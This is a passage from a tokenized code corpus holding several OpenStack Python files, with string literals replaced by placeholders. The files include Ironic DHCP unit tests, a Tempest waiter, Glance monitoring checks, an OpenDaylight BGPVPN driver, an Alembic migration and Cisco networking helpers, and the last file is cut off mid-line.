id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = expected <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> self . assertRaises ( exception . FailedToGetIPAddressOnPort , <EOL> api . _get_port_ip_address , task , port , <EOL> mock . sentinel . client ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__get_port_ip_address_for_portgroup_with_exception ( <EOL> self , mock_gfia ) : <EOL> expected = "<STR_LIT>" <EOL> pg = object_utils . create_test_portgroup ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = expected <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> self . assertRaises ( exception . FailedToGetIPAddressOnPort , <EOL> api . _get_port_ip_address , task , pg , <EOL> mock . sentinel . client ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__get_ip_addresses_ports ( self , mock_gfia ) : <EOL> ip_address = '<STR_LIT>' <EOL> expected = [ ip_address ] <EOL> port = object_utils . create_test_port ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> extra = { '<STR_LIT>' : <EOL> '<STR_LIT>' } , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = ip_address <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> result = api . _get_ip_addresses ( task , [ port ] , <EOL> mock . sentinel . client ) <EOL> self . assertEqual ( expected , result ) <EOL> @ mock . 
patch ( '<STR_LIT>' ) <EOL> def test__get_ip_addresses_portgroup ( self , mock_gfia ) : <EOL> ip_address = '<STR_LIT>' <EOL> expected = [ ip_address ] <EOL> pg = object_utils . create_test_portgroup ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> extra = { '<STR_LIT>' : <EOL> '<STR_LIT>' } , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = ip_address <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> result = api . _get_ip_addresses ( task , [ pg ] , mock . sentinel . client ) <EOL> self . assertEqual ( expected , result ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_ip_addresses ( self , get_ip_mock ) : <EOL> ip_address = '<STR_LIT>' <EOL> expected = [ ip_address ] <EOL> get_ip_mock . return_value = ip_address <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> result = api . get_ip_addresses ( task ) <EOL> get_ip_mock . assert_called_once_with ( task , task . ports [ <NUM_LIT:0> ] , <EOL> mock . ANY ) <EOL> self . assertEqual ( expected , result ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_ip_addresses_for_port_and_portgroup ( self , get_ip_mock ) : <EOL> object_utils . create_test_portgroup ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> extra = { '<STR_LIT>' : <EOL> '<STR_LIT>' } , <EOL> driver = '<STR_LIT>' ) <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> api . get_ip_addresses ( task ) <EOL> get_ip_mock . assert_has_calls ( <EOL> [ mock . call ( task , task . ports [ <NUM_LIT:0> ] , mock . ANY ) , <EOL> mock . call ( task , task . portgroups [ <NUM_LIT:0> ] , mock . 
ANY ) ] ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_create_cleaning_ports ( self , create_mock ) : <EOL> create_mock . return_value = { '<STR_LIT:port>' : self . neutron_port } <EOL> expected = { self . ports [ <NUM_LIT:0> ] . uuid : self . neutron_port [ '<STR_LIT:id>' ] } <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> ports = api . create_cleaning_ports ( task ) <EOL> self . assertEqual ( expected , ports ) <EOL> create_mock . assert_called_once_with ( { '<STR_LIT:port>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , '<STR_LIT>' : self . ports [ <NUM_LIT:0> ] . address } } ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_create_cleaning_ports_fail ( self , create_mock , rollback_mock ) : <EOL> create_mock . side_effect = neutron_client_exc . ConnectionFailed <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> self . assertRaises ( exception . NodeCleaningFailure , <EOL> api . create_cleaning_ports , <EOL> task ) <EOL> create_mock . assert_called_once_with ( { '<STR_LIT:port>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , '<STR_LIT>' : self . ports [ <NUM_LIT:0> ] . address } } ) <EOL> rollback_mock . assert_called_once_with ( task ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_create_cleaning_ports_fail_delayed ( self , create_mock , <EOL> rollback_mock ) : <EOL> """<STR_LIT>""" <EOL> mockport = mock . MagicMock ( ) <EOL> create_mock . return_value = mockport <EOL> mockport . get . return_value = True <EOL> mockitem = mock . Mock ( ) <EOL> mockport . __getitem__ . 
return_value = mockitem <EOL> mockitem . get . return_value = None <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> self . assertRaises ( exception . NodeCleaningFailure , <EOL> api . create_cleaning_ports , <EOL> task ) <EOL> create_mock . assert_called_once_with ( { '<STR_LIT:port>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , '<STR_LIT>' : self . ports [ <NUM_LIT:0> ] . address } } ) <EOL> rollback_mock . assert_called_once_with ( task ) <EOL> mockport . get . assert_called_once_with ( '<STR_LIT:port>' ) <EOL> mockitem . get . assert_called_once_with ( '<STR_LIT:id>' ) <EOL> mockport . __getitem__ . assert_called_once_with ( '<STR_LIT:port>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_create_cleaning_ports_bad_config ( self , create_mock ) : <EOL> self . config ( cleaning_network_uuid = None , group = '<STR_LIT>' ) <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> self . assertRaises ( exception . InvalidParameterValue , <EOL> api . create_cleaning_ports , task ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_delete_cleaning_ports ( self , list_mock , delete_mock ) : <EOL> other_port = { '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> list_mock . return_value = { '<STR_LIT>' : [ self . neutron_port , other_port ] } <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> api . delete_cleaning_ports ( task ) <EOL> list_mock . assert_called_once_with ( <EOL> network_id = '<STR_LIT>' ) <EOL> delete_mock . assert_called_once_with ( self . neutron_port [ '<STR_LIT:id>' ] ) <EOL> @ mock . patch . object ( client . 
Client , '<STR_LIT>' ) <EOL> def test_delete_cleaning_ports_list_fail ( self , list_mock ) : <EOL> list_mock . side_effect = neutron_client_exc . ConnectionFailed <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> self . assertRaises ( exception . NodeCleaningFailure , <EOL> api . delete_cleaning_ports , <EOL> task ) <EOL> list_mock . assert_called_once_with ( <EOL> network_id = '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_delete_cleaning_ports_delete_fail ( self , list_mock , delete_mock ) : <EOL> list_mock . return_value = { '<STR_LIT>' : [ self . neutron_port ] } <EOL> delete_mock . side_effect = neutron_client_exc . ConnectionFailed <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> self . assertRaises ( exception . NodeCleaningFailure , <EOL> api . delete_cleaning_ports , <EOL> task ) <EOL> list_mock . assert_called_once_with ( <EOL> network_id = '<STR_LIT>' ) <EOL> delete_mock . assert_called_once_with ( self . neutron_port [ '<STR_LIT:id>' ] ) <EOL> def test_out_range_auth_strategy ( self ) : <EOL> self . assertRaises ( ValueError , cfg . CONF . set_override , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> enforce_type = True ) </s>
<s> import time <EOL> from tempest . lib . common . utils import misc as misc_utils <EOL> from tempest . lib import exceptions as lib_exc <EOL> def wait_for_bm_node_status ( client , node_id , attr , status ) : <EOL> """<STR_LIT>""" <EOL> _ , node = client . show_node ( node_id ) <EOL> start = int ( time . time ( ) ) <EOL> while node [ attr ] != status : <EOL> time . sleep ( client . build_interval ) <EOL> _ , node = client . show_node ( node_id ) <EOL> status_curr = node [ attr ] <EOL> if status_curr == status : <EOL> return <EOL> if int ( time . time ( ) ) - start >= client . build_timeout : <EOL> message = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> { '<STR_LIT>' : node_id , <EOL> '<STR_LIT>' : attr , <EOL> '<STR_LIT:status>' : status , <EOL> '<STR_LIT>' : client . build_timeout } ) <EOL> message += '<STR_LIT>' % ( attr , status_curr ) <EOL> caller = misc_utils . find_test_caller ( ) <EOL> if caller : <EOL> message = '<STR_LIT>' % ( caller , message ) <EOL> raise lib_exc . TimeoutException ( message ) </s>
<s> import shade <EOL> class SanityChecks ( object ) : <EOL> @ staticmethod <EOL> def keystone ( cloud ) : <EOL> [ tenant for tenant in cloud . keystone_client . tenants . list ( ) ] <EOL> @ staticmethod <EOL> def glance ( cloud ) : <EOL> [ image for image in cloud . glance_client . images . list ( ) ] <EOL> @ staticmethod <EOL> def cinder ( cloud ) : <EOL> [ volume for volume in cloud . cinder_client . volumes . list ( ) ] <EOL> @ staticmethod <EOL> def swift ( cloud ) : <EOL> [ container for container in cloud . swift_client . list ( ) ] <EOL> def main ( ) : <EOL> module = AnsibleModule ( <EOL> argument_spec = openstack_full_argument_spec ( <EOL> password = dict ( required = True , type = '<STR_LIT:str>' ) , <EOL> project = dict ( required = True , type = '<STR_LIT:str>' ) , <EOL> role = dict ( required = True , type = '<STR_LIT:str>' ) , <EOL> user = dict ( required = True , type = '<STR_LIT:str>' ) , <EOL> service = dict ( required = True , type = '<STR_LIT:str>' ) , <EOL> ) <EOL> ) <EOL> try : <EOL> changed = True <EOL> cloud = shade . operator_cloud ( ** module . params ) <EOL> getattr ( SanityChecks , module . params . pop ( "<STR_LIT>" ) ) ( cloud ) <EOL> module . exit_json ( changed = changed ) <EOL> except Exception as e : <EOL> module . exit_json ( failed = True , changed = True , msg = e ) <EOL> from ansible . module_utils . basic import * <EOL> from ansible . module_utils . openstack import * <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from oschecks import utils <EOL> def _check_glance_api ( ) : <EOL> glance = utils . Glance ( ) <EOL> glance . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , type = int , default = <NUM_LIT:5> , <EOL> help = '<STR_LIT>' ) <EOL> glance . add_argument ( '<STR_LIT:-c>' , dest = '<STR_LIT>' , type = int , default = <NUM_LIT:10> , <EOL> help = '<STR_LIT>' ) <EOL> options , args , client = glance . setup ( ) <EOL> def images_list ( ) : <EOL> return list ( client . images . list ( ) ) <EOL> elapsed , images = utils . timeit ( images_list ) <EOL> if not images : <EOL> utils . critical ( "<STR_LIT>" ) <EOL> if elapsed > options . critical : <EOL> utils . critical ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( options . critical , elapsed ) ) <EOL> elif elapsed > options . warning : <EOL> utils . warning ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( options . warning , elapsed ) ) <EOL> else : <EOL> utils . ok ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( len ( images ) , elapsed , elapsed ) ) <EOL> def check_glance_api ( ) : <EOL> utils . safe_run ( _check_glance_api ) <EOL> def _check_glance_image_exists ( ) : <EOL> glance = utils . Glance ( ) <EOL> glance . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , type = int , <EOL> required = False , default = <NUM_LIT:0> , <EOL> help = '<STR_LIT>' ) <EOL> glance . add_argument ( '<STR_LIT>' , metavar = '<STR_LIT>' , type = str , <EOL> nargs = '<STR_LIT:+>' , required = False , <EOL> help = '<STR_LIT>' ) <EOL> options , args , client = glance . setup ( ) <EOL> valid_image = <NUM_LIT:0> <EOL> count = len ( list ( client . images . list ( ** { "<STR_LIT>" : options . req_count or <NUM_LIT:1> } ) ) ) <EOL> if options . req_images : <EOL> required_images = options . req_images <EOL> for image in required_images : <EOL> try : <EOL> if len ( list ( client . images . 
list ( <EOL> ** { "<STR_LIT>" : { "<STR_LIT:name>" : image } } ) ) ) == <NUM_LIT:1> : <EOL> valid_image = valid_image + <NUM_LIT:1> <EOL> except Exception : <EOL> pass <EOL> if options . req_count and count < options . req_count : <EOL> utils . critical ( "<STR_LIT>" % <EOL> ( options . req_count , count ) ) <EOL> if options . req_images and valid_image < len ( required_images ) : <EOL> utils . critical ( "<STR_LIT>" % <EOL> ( "<STR_LIT:U+002CU+0020>" . join ( required_images ) , valid_image , <EOL> len ( required_images ) ) ) <EOL> if options . req_images and options . req_count : <EOL> utils . ok ( "<STR_LIT>" % <EOL> ( "<STR_LIT:U+002CU+0020>" . join ( required_images ) , options . req_count ) ) <EOL> elif options . req_images : <EOL> utils . ok ( "<STR_LIT>" % ( "<STR_LIT:U+002CU+0020>" . join ( required_images ) ) ) <EOL> elif options . req_count : <EOL> utils . ok ( "<STR_LIT>" % ( count ) ) <EOL> else : <EOL> utils . ok ( "<STR_LIT>" ) <EOL> def check_glance_image_exists ( ) : <EOL> utils . safe_run ( _check_glance_image_exists ) <EOL> def _check_glance_upload ( ) : <EOL> glance = utils . Glance ( ) <EOL> glance . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , type = str , <EOL> default = "<STR_LIT>" , <EOL> help = '<STR_LIT>' ) <EOL> options , args , client = glance . setup ( ) <EOL> data_raw = "<STR_LIT:X>" * <NUM_LIT> * <NUM_LIT> <EOL> elapsed , res = utils . timeit ( client . images . create , <EOL> data = data_raw , <EOL> disk_format = '<STR_LIT>' , <EOL> container_format = '<STR_LIT>' , <EOL> name = options . image_name ) <EOL> if not res or not res . id or res . status != '<STR_LIT>' : <EOL> utils . critical ( "<STR_LIT>" ) <EOL> res . delete ( ) <EOL> if elapsed > <NUM_LIT:20> : <EOL> utils . warning ( "<STR_LIT>" ) <EOL> else : <EOL> utils . ok ( "<STR_LIT>" % elapsed ) <EOL> def check_glance_upload ( ) : <EOL> utils . safe_run ( _check_glance_upload ) </s>
<s> import requests <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import excutils <EOL> from networking_odl . common import client as odl_client <EOL> from networking_bgpvpn . neutron . extensions import bgpvpn as bgpvpn_ext <EOL> from networking_bgpvpn . neutron . services . common import constants <EOL> from networking_bgpvpn . neutron . services . service_drivers import driver_api <EOL> cfg . CONF . import_group ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> BGPVPNS = '<STR_LIT>' <EOL> OPENDAYLIGHT_BGPVPN_DRIVER_NAME = '<STR_LIT>' <EOL> class OpenDaylightBgpvpnDriver ( driver_api . BGPVPNDriver ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , service_plugin ) : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> super ( OpenDaylightBgpvpnDriver , self ) . __init__ ( service_plugin ) <EOL> self . service_plugin = service_plugin <EOL> self . client = odl_client . OpenDaylightRestClient . create_client ( ) <EOL> def _scrub_rd_list ( self , bgpvpn ) : <EOL> if len ( bgpvpn [ '<STR_LIT>' ] ) > <NUM_LIT:1> : <EOL> bgpvpn [ '<STR_LIT>' ] = bgpvpn [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> def create_bgpvpn_precommit ( self , context , bgpvpn ) : <EOL> if bgpvpn [ '<STR_LIT:type>' ] != constants . BGPVPN_L3 : <EOL> raise bgpvpn_ext . BGPVPNTypeNotSupported ( <EOL> driver = OPENDAYLIGHT_BGPVPN_DRIVER_NAME , <EOL> type = bgpvpn [ '<STR_LIT:type>' ] ) <EOL> def create_bgpvpn_postcommit ( self , context , bgpvpn ) : <EOL> url = BGPVPNS <EOL> try : <EOL> self . _scrub_rd_list ( bgpvpn ) <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) <EOL> except requests . exceptions . RequestException : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> d_bgpvpn = self . bgpvpn_db . delete_bgpvpn ( context , bgpvpn [ '<STR_LIT:id>' ] ) <EOL> LOG . 
debug ( "<STR_LIT>" , d_bgpvpn ) <EOL> def delete_bgpvpn_postcommit ( self , context , bgpvpn ) : <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . client . sendjson ( '<STR_LIT>' , url , None ) <EOL> def update_bgpvpn_postcommit ( self , context , old_bgpvpn , bgpvpn ) : <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) <EOL> def create_net_assoc_precommit ( self , context , net_assoc ) : <EOL> bgpvpns = self . bgpvpn_db . find_bgpvpns_for_network ( <EOL> context , net_assoc [ '<STR_LIT>' ] ) <EOL> if len ( bgpvpns ) > <NUM_LIT:1> : <EOL> raise bgpvpn_ext . BGPVPNNetworkAssocExistsAnotherBgpvpn ( <EOL> driver = OPENDAYLIGHT_BGPVPN_DRIVER_NAME , <EOL> network = net_assoc [ '<STR_LIT>' ] , <EOL> bgpvpn = bgpvpns [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> def create_net_assoc_postcommit ( self , context , net_assoc ) : <EOL> bgpvpn = self . get_bgpvpn ( context , net_assoc [ '<STR_LIT>' ] ) <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . _scrub_rd_list ( bgpvpn ) <EOL> try : <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) <EOL> except requests . exceptions . RequestException : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> d_netassoc = self . bgpvpn_db . delete_net_assoc ( <EOL> context , net_assoc [ '<STR_LIT:id>' ] , net_assoc [ '<STR_LIT>' ] ) <EOL> LOG . debug ( "<STR_LIT>" , d_netassoc ) <EOL> def delete_net_assoc_postcommit ( self , context , net_assoc ) : <EOL> bgpvpn = self . get_bgpvpn ( context , net_assoc [ '<STR_LIT>' ] ) <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) <EOL> def create_router_assoc_precommit ( self , context , router_assoc ) : <EOL> associated_routers = self . 
get_router_assocs ( context , <EOL> router_assoc [ '<STR_LIT>' ] ) <EOL> for assoc_router in associated_routers : <EOL> if ( router_assoc [ "<STR_LIT>" ] != assoc_router [ "<STR_LIT>" ] ) : <EOL> raise bgpvpn_ext . BGPVPNMultipleRouterAssocNotSupported ( <EOL> driver = OPENDAYLIGHT_BGPVPN_DRIVER_NAME ) <EOL> def create_router_assoc_postcommit ( self , context , router_assoc ) : <EOL> bgpvpn = self . get_bgpvpn ( context , router_assoc [ '<STR_LIT>' ] ) <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . _scrub_rd_list ( bgpvpn ) <EOL> try : <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) <EOL> except requests . exceptions . RequestException : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> d_routerassoc = self . bgpvpn_db . delete_router_assoc ( <EOL> context , router_assoc [ '<STR_LIT:id>' ] , router_assoc [ '<STR_LIT>' ] ) <EOL> LOG . debug ( "<STR_LIT>" , d_routerassoc ) <EOL> def delete_router_assoc_postcommit ( self , context , router_assoc ) : <EOL> bgpvpn = self . get_bgpvpn ( context , router_assoc [ '<STR_LIT>' ] ) <EOL> url = BGPVPNS + '<STR_LIT:/>' + bgpvpn [ '<STR_LIT:id>' ] <EOL> self . client . sendjson ( '<STR_LIT>' , url , { BGPVPNS [ : - <NUM_LIT:1> ] : bgpvpn } ) </s>
<s> VM_INFO = <NUM_LIT:1000> <EOL> UPDATE_IP_RULE = <NUM_LIT> <EOL> UPLINK_NAME = <NUM_LIT> <EOL> DFA_AGENT_QUEUE = '<STR_LIT>' <EOL> DFA_SERVER_QUEUE = '<STR_LIT>' <EOL> DFA_EXCHANGE = '<STR_LIT>' <EOL> RESULT_FAIL = '<STR_LIT>' <EOL> RESULT_SUCCESS = '<STR_LIT>' <EOL> CREATE_FAIL = '<STR_LIT>' <EOL> DELETE_FAIL = '<STR_LIT>' <EOL> UPDATE_FAIL = '<STR_LIT>' <EOL> IP_DHCP_WAIT = "<STR_LIT>" <EOL> DHCP_PORT_CHECK = <NUM_LIT:3> <EOL> MAIN_INTERVAL = <NUM_LIT:5> <EOL> PROCESS_QUE_INTERVAL = <NUM_LIT:1> <EOL> FAIL_REC_INTERVAL = <NUM_LIT> <EOL> HB_INTERVAL = <NUM_LIT:30> <EOL> INVALID_OFPORT = - <NUM_LIT:1> <EOL> INVALID_VLAN = - <NUM_LIT:1> <EOL> MIN_VLAN_TAG = <NUM_LIT:1> <EOL> MAX_VLAN_TAG = <NUM_LIT> <EOL> VM_MSG_TYPE = <NUM_LIT:50> <EOL> UPLINK_MSG_TYPE = <NUM_LIT> <EOL> UPLINK_DET_INTERVAL = <NUM_LIT:10> <EOL> ERR_PROC_INTERVAL = <NUM_LIT:20> <EOL> UPLINK_DOWN_THRES = <NUM_LIT:2> <EOL> Q_UPL_PRIO = <NUM_LIT:1> <EOL> Q_VM_PRIO = <NUM_LIT:2> </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , default = <NUM_LIT:0> ) ) <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False , <EOL> server_default = sa . sql . false ( ) ) ) </s>
<s> import abc <EOL> import six <EOL> from oslo_log import log as logging <EOL> from networking_cisco . _i18n import _ <EOL> from six . moves import queue as Queue <EOL> LOG = logging . getLogger ( __name__ ) <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class ServiceHelperBase ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _observers = [ ] <EOL> def register ( self , observer ) : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT>' : observer . __class__ . __name__ , <EOL> '<STR_LIT>' : self . __class__ . __name__ } ) <EOL> if observer not in self . _observers : <EOL> self . _observers . append ( observer ) <EOL> else : <EOL> raise ValueError ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : observer . __class__ . __name__ , <EOL> '<STR_LIT>' : self . __class__ . __name__ } ) <EOL> def unregister ( self , observer ) : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT>' : observer . __class__ . __name__ , <EOL> '<STR_LIT>' : self . __class__ . __name__ } ) <EOL> if observer in self . _observers : <EOL> self . _observers . remove ( observer ) <EOL> else : <EOL> raise ValueError ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : observer . __class__ . __name__ , <EOL> '<STR_LIT>' : self . __class__ . __name__ } ) <EOL> def notify ( self , resource , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> for observer in self . _observers : <EOL> LOG . debug ( "<STR_LIT>" , observer . __class__ . __name__ ) <EOL> observer . update ( resource , ** kwargs ) <EOL> def update ( self , resource , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> @ abc . abstractmethod <EOL> def process_service ( self , * args , ** kwargs ) : <EOL> raise NotImplementedError <EOL> class QueueMixin ( object ) : <EOL> def __init__ ( self ) : <EOL> super ( QueueMixin , self ) . __init__ ( ) <EOL> self . _queues = { } <EOL> def enqueue ( self , qname , data ) : <EOL> if qname not in self . 
_queues : <EOL> self . _queues [ qname ] = Queue . Queue ( ) <EOL> queue = self . _queues [ qname ] <EOL> queue . put ( data ) <EOL> def dequeue ( self , qname ) : <EOL> if qname not in self . _queues : <EOL> raise ValueError ( _ ( "<STR_LIT>" ) , qname ) <EOL> try : <EOL> return self . _queues [ qname ] . get ( block = False ) <EOL> except Queue . Empty : <EOL> return None <EOL> def qsize ( self , qname ) : <EOL> """<STR_LIT>""" <EOL> if qname in self . _queues : <EOL> return self . _queues [ qname ] . qsize ( ) <EOL> else : <EOL> raise ValueError ( _ ( "<STR_LIT>" ) , qname ) </s>
<s> T1_SUBNET_CIDR = '<STR_LIT>' <EOL> T2_SUBNET_CIDR = '<STR_LIT>' <EOL> T1_PORT_NAME = '<STR_LIT>' <EOL> T2_PORT_NAME = '<STR_LIT>' <EOL> T1_NETWORK_NAME = '<STR_LIT>' <EOL> T2_NETWORK_NAME = '<STR_LIT>' <EOL> T1_SUBNET_NAME = '<STR_LIT>' <EOL> T2_SUBNET_NAME = '<STR_LIT>' </s>
<s> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_service import loopingcall <EOL> from oslo_utils import importutils <EOL> from neutron . common import rpc as n_rpc <EOL> from neutron import manager <EOL> import networking_cisco . plugins <EOL> from networking_cisco . plugins . cisco . common import ( cisco_constants as <EOL> c_constants ) <EOL> from networking_cisco . plugins . cisco . db . device_manager import ( <EOL> hosting_device_manager_db as dev_mgr_db ) <EOL> from networking_cisco . plugins . cisco . db . scheduler import ( <EOL> cfg_agentschedulers_db as agt_sched_db ) <EOL> from networking_cisco . plugins . cisco . device_manager . rpc import ( <EOL> devices_cfgagent_rpc_cb as devices_rpc ) <EOL> from networking_cisco . plugins . cisco . device_manager . rpc import ( <EOL> devmgr_rpc_cfgagent_api ) <EOL> from networking_cisco . plugins . cisco . extensions import ciscocfgagentscheduler <EOL> from networking_cisco . plugins . cisco . extensions import ciscohostingdevicemanager <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class CiscoDeviceManagerPlugin ( dev_mgr_db . HostingDeviceManagerMixin , <EOL> agt_sched_db . CfgAgentSchedulerDbMixin ) : <EOL> """<STR_LIT>""" <EOL> supported_extension_aliases = [ <EOL> ciscohostingdevicemanager . HOSTING_DEVICE_MANAGER_ALIAS , <EOL> ciscocfgagentscheduler . CFG_AGENT_SCHEDULER_ALIAS ] <EOL> path_prefix = ciscocfgagentscheduler . PATH_PREFIX <EOL> def __init__ ( self ) : <EOL> self . setup_rpc ( ) <EOL> basepath = networking_cisco . plugins . __path__ [ <NUM_LIT:0> ] <EOL> ext_paths = [ basepath + '<STR_LIT>' ] <EOL> cp = cfg . CONF . api_extensions_path <EOL> to_add = "<STR_LIT>" <EOL> for ext_path in ext_paths : <EOL> if cp . find ( ext_path ) == - <NUM_LIT:1> : <EOL> to_add += '<STR_LIT::>' + ext_path <EOL> if to_add != "<STR_LIT>" : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , cp + to_add ) <EOL> self . cfg_agent_scheduler = importutils . 
